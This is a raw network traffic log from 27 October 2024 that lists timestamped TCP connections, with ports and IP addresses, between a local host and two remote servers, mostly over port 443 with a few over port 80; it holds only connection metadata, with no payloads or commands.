Oct 27, 2024 17:11:39.569333076 CET	443	57921	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.571655035 CET	443	57922	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.571796894 CET	443	57922	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.571856976 CET	57922	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.571940899 CET	57922	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.571957111 CET	443	57922	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.571970940 CET	57922	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.571985006 CET	443	57922	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.572408915 CET	57926	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.572436094 CET	443	57926	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.572499037 CET	57926	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.572685957 CET	57926	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.572700024 CET	443	57926	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.574388027 CET	57927	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.574438095 CET	443	57927	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.574536085 CET	57927	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.574625969 CET	57927	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.574651957 CET	443	57927	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.579849005 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.579940081 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.579992056 CET	57923	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.580004930 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.580054045 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.580082893 CET	57923	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.580096006 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.580106974 CET	57923	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.580106974 CET	57923	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.580113888 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.580127954 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.581132889 CET	443	57924	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.582094908 CET	57928	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.582128048 CET	443	57928	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.582191944 CET	57928	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.582302094 CET	57928	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.582319021 CET	443	57928	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.582957983 CET	443	57924	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.583017111 CET	57924	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.583045006 CET	57924	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.583053112 CET	443	57924	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.583060980 CET	57924	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.583064079 CET	443	57924	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.585242033 CET	57929	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.585275888 CET	443	57929	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.585371017 CET	57929	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.585501909 CET	57929	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.585517883 CET	443	57929	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.598463058 CET	443	57925	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.598527908 CET	443	57925	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.598587990 CET	57925	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.598824024 CET	57925	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.598838091 CET	443	57925	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.598850012 CET	57925	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.598854065 CET	443	57925	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.601535082 CET	57930	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.601546049 CET	443	57930	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.601629019 CET	57930	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.601782084 CET	57930	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.601792097 CET	443	57930	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.306548119 CET	443	57927	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.307002068 CET	57927	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.307028055 CET	443	57927	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.307466984 CET	57927	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.307478905 CET	443	57927	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.307796955 CET	443	57926	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.308100939 CET	57926	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.308120012 CET	443	57926	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.308459044 CET	57926	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.308464050 CET	443	57926	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.334506989 CET	443	57929	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.334568977 CET	443	57928	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.335036039 CET	57929	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.335083961 CET	443	57929	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.335129976 CET	57928	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.335144043 CET	443	57928	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.335376024 CET	443	57930	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.335458040 CET	57928	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.335462093 CET	443	57928	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.335551023 CET	57929	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.335566044 CET	443	57929	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.335669041 CET	57930	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.335675001 CET	443	57930	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.335994959 CET	57930	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.335999012 CET	443	57930	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.436146975 CET	443	57926	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.436217070 CET	443	57926	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.436259031 CET	57926	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.436270952 CET	443	57926	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.436315060 CET	443	57926	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.436352968 CET	57926	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.436475992 CET	57926	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.436494112 CET	443	57926	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.436501026 CET	57926	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.436506987 CET	443	57926	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.437410116 CET	443	57927	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.437459946 CET	443	57927	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.437513113 CET	57927	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.437669039 CET	57927	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.437669039 CET	57927	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.437694073 CET	443	57927	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.437717915 CET	443	57927	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.440354109 CET	57931	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.440397978 CET	443	57931	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.440455914 CET	57931	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.441771984 CET	57932	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.441859007 CET	443	57932	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.441910982 CET	57931	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.441936970 CET	57932	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.441937923 CET	443	57931	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.442018032 CET	57932	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.442054987 CET	443	57932	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.463306904 CET	443	57929	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.463449955 CET	443	57929	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.463522911 CET	57929	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.463522911 CET	57929	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.463570118 CET	57929	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.463589907 CET	443	57929	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.464695930 CET	443	57928	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.464756966 CET	443	57928	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.464806080 CET	57928	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.464813948 CET	443	57928	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.464858055 CET	443	57928	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.464910030 CET	57928	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.464939117 CET	57928	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.464946032 CET	443	57928	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.464955091 CET	57928	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.464958906 CET	443	57928	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.465522051 CET	443	57930	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.465794086 CET	443	57930	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.465841055 CET	57930	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.466219902 CET	57933	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.466254950 CET	443	57933	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.466314077 CET	57933	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.466360092 CET	57930	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.466363907 CET	443	57930	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.466372013 CET	57930	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.466375113 CET	443	57930	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.467845917 CET	57934	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.467878103 CET	443	57934	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.467941046 CET	57934	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.468122959 CET	57933	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.468137026 CET	443	57933	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.468233109 CET	57934	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.468257904 CET	443	57934	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.469156981 CET	57935	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.469167948 CET	443	57935	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.469228029 CET	57935	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.469357967 CET	57935	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:40.469367027 CET	443	57935	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:40.928978920 CET	57920	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:40.929290056 CET	57936	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:40.934631109 CET	80	57936	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:40.934716940 CET	57936	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:40.934854031 CET	57936	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:40.934870005 CET	80	57920	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:40.934931040 CET	57920	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:40.942205906 CET	80	57936	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:41.339634895 CET	443	57932	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.340152025 CET	57932	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.340188980 CET	443	57932	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.340648890 CET	57932	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.340665102 CET	443	57932	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.344417095 CET	443	57934	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.344726086 CET	57934	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.344742060 CET	443	57934	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.345082998 CET	57934	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.345109940 CET	443	57934	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.349658966 CET	443	57933	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.349935055 CET	57933	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.349956036 CET	443	57933	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.349971056 CET	443	57935	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.350039959 CET	443	57931	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.350188017 CET	57935	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.350200891 CET	443	57935	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.350513935 CET	57933	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.350518942 CET	443	57933	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.350702047 CET	57931	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.350722075 CET	57935	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.350727081 CET	443	57935	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.350740910 CET	443	57931	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.351041079 CET	57931	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.351052046 CET	443	57931	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.471446991 CET	443	57932	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.471498013 CET	443	57932	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.471586943 CET	57932	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.471761942 CET	57932	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.471787930 CET	443	57932	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.471838951 CET	57932	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.471853018 CET	443	57932	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.474349022 CET	57937	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.474368095 CET	443	57937	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.474443913 CET	57937	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.474556923 CET	57937	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.474570036 CET	443	57937	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.478003025 CET	443	57934	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.478030920 CET	443	57934	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.478076935 CET	443	57934	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.478091002 CET	57934	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.478138924 CET	57934	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.478266954 CET	57934	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.478266954 CET	57934	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.478283882 CET	443	57934	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.478303909 CET	443	57934	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.479918003 CET	57938	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.479959965 CET	443	57938	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.480055094 CET	57938	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.480135918 CET	57938	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.480165005 CET	443	57938	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.480567932 CET	443	57935	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.480711937 CET	443	57935	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.480766058 CET	57935	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.480791092 CET	57935	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.480804920 CET	443	57935	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.480815887 CET	57935	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.480829000 CET	443	57935	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.481946945 CET	443	57931	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.482013941 CET	443	57931	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.482094049 CET	57931	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.482114077 CET	443	57931	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.482156992 CET	443	57931	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.482227087 CET	57931	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.482228041 CET	57931	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.482228041 CET	57931	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.482274055 CET	443	57931	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.482700109 CET	57939	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.482708931 CET	443	57939	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.482762098 CET	57939	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.482867956 CET	57939	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.482877016 CET	443	57939	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.483541965 CET	443	57933	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.483630896 CET	443	57933	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.483684063 CET	57933	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.483700037 CET	57933	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.483707905 CET	443	57933	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.483716965 CET	57933	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.483721018 CET	443	57933	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.483925104 CET	57940	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.483944893 CET	443	57940	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.483997107 CET	57940	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.484186888 CET	57940	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.484200954 CET	443	57940	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.485162020 CET	57941	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.485212088 CET	443	57941	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.485290051 CET	57941	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.485394955 CET	57941	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.485423088 CET	443	57941	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.787729025 CET	57931	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:41.787759066 CET	443	57931	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:41.815068007 CET	80	57936	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:41.815165043 CET	57936	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:42.210433006 CET	443	57940	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.210977077 CET	57940	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.210999966 CET	443	57940	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.211477995 CET	57940	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.211484909 CET	443	57940	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.217080116 CET	443	57937	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.219578981 CET	443	57939	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.219688892 CET	57937	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.219701052 CET	443	57937	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.220078945 CET	57937	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.220084906 CET	443	57937	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.220282078 CET	57939	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.220292091 CET	443	57939	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.220594883 CET	57939	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.220598936 CET	443	57939	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.230663061 CET	443	57938	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.231200933 CET	57938	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.231225014 CET	443	57938	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.231539011 CET	57938	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.231551886 CET	443	57938	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.233390093 CET	443	57941	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.233633041 CET	57941	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.233692884 CET	443	57941	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.233922958 CET	57941	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.233936071 CET	443	57941	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.337569952 CET	443	57940	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.337647915 CET	443	57940	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.337709904 CET	57940	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.337853909 CET	57940	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.337872028 CET	443	57940	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.337888956 CET	57940	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.337893963 CET	443	57940	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.340925932 CET	57942	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.340940952 CET	443	57942	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.341027975 CET	57942	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.341159105 CET	57942	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.341171980 CET	443	57942	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.348592043 CET	443	57937	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.348664045 CET	443	57937	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.348699093 CET	443	57937	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.348716021 CET	57937	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.348752975 CET	57937	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.348800898 CET	57937	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.348809958 CET	443	57937	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.348818064 CET	57937	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.348822117 CET	443	57937	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.349221945 CET	443	57939	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.349524021 CET	443	57939	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.349575996 CET	57939	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.349620104 CET	57939	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.349622965 CET	443	57939	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.349631071 CET	57939	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.349633932 CET	443	57939	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.351135969 CET	57943	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.351224899 CET	443	57943	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.351308107 CET	57943	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.351385117 CET	57943	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.351408005 CET	443	57943	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.351855993 CET	57944	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.351895094 CET	443	57944	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.351959944 CET	57944	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.352042913 CET	57944	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.352061033 CET	443	57944	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.364434004 CET	443	57938	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.364499092 CET	443	57938	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.364561081 CET	57938	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.364610910 CET	57938	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.364610910 CET	57938	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.364635944 CET	443	57938	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.364659071 CET	443	57938	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.365827084 CET	443	57941	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.365866899 CET	443	57941	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.365912914 CET	443	57941	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.365931988 CET	57941	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.365998030 CET	57941	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.366257906 CET	57941	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.366257906 CET	57941	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.366302013 CET	443	57941	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.366328955 CET	443	57941	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.366419077 CET	57945	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.366452932 CET	443	57945	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.366506100 CET	57945	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.366600037 CET	57945	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.366616011 CET	443	57945	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.367911100 CET	57946	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.367923021 CET	443	57946	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:42.367991924 CET	57946	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.368099928 CET	57946	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:42.368118048 CET	443	57946	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.319608927 CET	57936	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:43.319901943 CET	57947	80	192.168.2.4	152.89.198.124
